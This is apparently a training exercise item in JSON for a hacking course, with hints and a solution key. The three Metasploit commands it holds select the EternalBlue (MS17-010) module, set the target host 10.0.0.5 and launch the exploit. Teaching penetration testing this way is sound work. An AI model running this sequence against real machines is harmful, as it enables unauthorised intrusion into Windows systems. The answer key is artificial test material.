{
  "id": "task1",
  "chapterId": "ch_8",
  "title": "Metasploit Master 🤖",
  "description": "Using Metasploit, select an exploit and set the target IP address.",
  "estimatedMinutes": 10,
  "problemStatement": "You have identified an eternalblue vulnerability on a target computer with the IP address `10.0.0.5`. \n\n**Your Mission**: Complete the command sequence to start the exploit using the module `exploit/windows/smb/ms17_010_eternalblue`.\n\n1. Command to select the module: `______` \n2. Command to set the target IP: `______` \n3. Command to start the attack: `______` ",
  "hints": [
    "Use 'use' to select a module.",
    "The target IP is the 'RHOSTS'.",
    "Type 'exploit' or 'run' to begin."
  ],
  "expectedOutput": "1. use exploit/windows/smb/ms17_010_eternalblue\n2. set RHOSTS 10.0.0.5\n3. exploit",
  "solutionCode": "1. use exploit/windows/smb/ms17_010_eternalblue\n2. set RHOSTS 10.0.0.5\n3. exploit"
}
